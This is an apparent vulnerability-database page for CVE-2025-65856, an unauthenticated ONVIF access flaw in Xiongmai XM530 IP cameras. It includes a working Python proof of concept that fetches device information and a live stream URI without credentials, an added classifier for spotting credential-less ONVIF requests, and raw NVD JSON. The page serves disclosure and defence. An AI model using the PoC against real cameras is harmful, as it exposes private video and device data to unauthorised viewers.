Security Vulnerability Report
CVE-2025-65856 CVSS 9.8 CRITICAL

Published: 2025-12-22 22:16:08
Last Modified: 2026-01-05 18:28:47

Description

Authentication bypass vulnerability in Xiongmai XM530 IP cameras on Firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06 allows unauthenticated remote attackers to access sensitive device information and live video streams. The ONVIF implementation fails to enforce authentication on 31 critical endpoints, enabling direct unauthorized video stream access.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:xiongmaitech:xm530v200_x6-weq_8m_firmware:5.00.r02.000807d8.10010.346624.s.onvif_21.06:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:xiongmaitech:xm530v200_x6-weq_8m:-:*:*:*:*:*:*:* - NOT VULNERABLE
Xiongmai XM530 IP Camera firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-65856 PoC - Xiongmai XM530 IP Camera ONVIF Authentication Bypass
Author: Security Researcher
"""
import requests
import xml.etree.ElementTree as ET

TARGET_IP = "192.168.1.100"  # Target camera IP
ONVIF_PORT = 80

# ONVIF namespaces
NAMESPACES = {
    'SOAP-ENV': 'http://www.w3.org/2003/05/soap-envelope',
    'ns1': 'http://www.onvif.org/ver10/device/wsdl',
    'tt': 'http://www.onvif.org/ver10/schema'
}


def create_onvif_request(soap_body):
    """Generate ONVIF SOAP request without authentication"""
    return f'''<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope">
    <SOAP-ENV:Header/>
    <SOAP-ENV:Body>
        {soap_body}
    </SOAP-ENV:Body>
</SOAP-ENV:Envelope>'''


def send_onvif_request(endpoint, soap_body):
    """Send ONVIF request to target device"""
    url = f"http://{TARGET_IP}:{ONVIF_PORT}/{endpoint}"
    headers = {'Content-Type': 'application/soap+xml; charset=utf-8'}
    try:
        resp = requests.post(url, data=soap_body.encode(), headers=headers, timeout=5)
        return resp.text
    except Exception as e:
        return f"Error: {e}"


def get_device_info():
    """Bypass auth to get device information"""
    soap = '''<ns1:GetDeviceInformation/>'''
    request = create_onvif_request(soap)
    return send_onvif_request('onvif/device_service', request)


def get_stream_uri():
    """Bypass auth to get live video stream URI"""
    soap = '''<ns1:GetStreamUri>
    <ns1:StreamSetup>
        <tt:Stream>RTP-Unicast</tt:Stream>
        <tt:Transport><tt:Protocol>RTSP</tt:Protocol></tt:Transport>
    </ns1:StreamSetup>
    <ns1:ProfileToken>Profile_1</ns1:ProfileToken>
</ns1:GetStreamUri>'''
    request = create_onvif_request(soap)
    return send_onvif_request('onvif/media_service', request)


def main():
    print(f"[*] CVE-2025-65856 PoC - Targeting {TARGET_IP}")
    print("[*] Testing authentication bypass on ONVIF endpoints\n")

    print("[1] Attempting to get device information...")
    device_info = get_device_info()
    print(device_info)

    print("\n[2] Attempting to get video stream URI...")
    stream_uri = get_stream_uri()
    print(stream_uri)

    print("\n[!] If unauthenticated access succeeds, device is vulnerable")


if __name__ == "__main__":
    main()
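
Detection-side counterpart to the requests above, as an added example (not part of the original record or the researcher's PoC): it classifies captured HTTP POSTs to ONVIF endpoints by whether any credential (WS-Security UsernameToken or HTTP Digest) was presented. The function names, the pre-auth allowlist and the sample requests are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

SOAP = "http://www.w3.org/2003/05/soap-envelope"
WSSE = ("http://docs.oasis-open.org/wss/2004/01/"
        "oasis-200401-wss-wssecurity-secext-1.0.xsd")
MEDIA = "http://www.onvif.org/ver10/media/wsdl"
PRE_AUTH_OPS = {"GetSystemDateAndTime"}  # assumption: extend per site policy

def classify(path, headers, body):
    """Return (operation, verdict) for one captured HTTP POST."""
    if not path.lower().startswith("/onvif/"):
        return None, "not-onvif"
    try:
        if b"<!DOCTYPE" in body:  # SOAP needs no DTD; do not parse one
            raise ET.ParseError("DTD present")
        root = ET.fromstring(body)
        op = root.find(f"{{{SOAP}}}Body")[0].tag.rsplit("}", 1)[-1]
    except (ET.ParseError, TypeError, IndexError):
        return None, "malformed"  # e.g. undeclared namespace prefix
    # Credentials are checked for presence only, not validated.
    token = root.find(f"{{{SOAP}}}Header/{{{WSSE}}}Security/"
                      f"{{{WSSE}}}UsernameToken")
    auth = {k.lower(): v for k, v in headers.items()}.get("authorization", "")
    if token is not None or auth.lower().startswith("digest "):
        return op, "credentialed"
    return op, ("pre-auth-ok" if op in PRE_AUTH_OPS else "unauthenticated")

def envelope(header, body):
    """Build a constructed SOAP 1.2 request for the samples below."""
    return (f'<s:Envelope xmlns:s="{SOAP}" xmlns:w="{WSSE}" xmlns:m="{MEDIA}">'
            f'<s:Header>{header}</s:Header><s:Body>{body}</s:Body>'
            f'</s:Envelope>').encode()

# Constructed sample requests (not captured traffic).
SAMPLES = [
    ("/onvif/media_service", {}, envelope("", "<m:GetStreamUri/>")),
    ("/onvif/media_service", {}, envelope(
        "<w:Security><w:UsernameToken/></w:Security>", "<m:GetStreamUri/>")),
    ("/onvif/media_service", {"Authorization": 'Digest username="viewer"'},
     envelope("", "<m:GetProfiles/>")),
    ("/onvif/device_service", {},
     b"<Envelope><Body><ns1:GetDeviceInformation/></Body></Envelope>"),
]

def audit(samples):
    """Return verdicts worth alerting on: no credentials, or unparseable."""
    return [r for r in (classify(*s) for s in samples)
            if r[1] in ("unauthenticated", "malformed")]
```

A "credentialed" verdict only means a credential was presented; pairing an "unauthenticated" or "malformed" verdict with the HTTP response status shows whether the device actually answered the request.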

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65856", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:16:08.360", "lastModified": "2026-01-05T18:28:47.093", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication bypass vulnerability in Xiongmai XM530 IP cameras on Firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06 allows unauthenticated remote attackers to access sensitive device information and live video streams. The ONVIF implementation fails to enforce authentication on 31 critical endpoints, enabling direct unauthorized video stream access."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:xiongmaitech:xm530v200_x6-weq_8m_firmware:5.00.r02.000807d8.10010.346624.s.onvif_21.06:*:*:*:*:*:*:*", "matchCriteriaId": "6DFBF9B8-CA55-459F-95F9-3606B52D92B7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:xiongmaitech:xm530v200_x6-weq_8m:-:*:*:*:*:*:*:*", "matchCriteriaId": "D72FD0CF-CE0C-4466-8F42-099FA0E8D7D5"}]}]}], "references": [{"url": "http://hangzhou.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "http://ip.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": 
"https://luismirandaacebedo.github.io/CVE-2025-65856/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}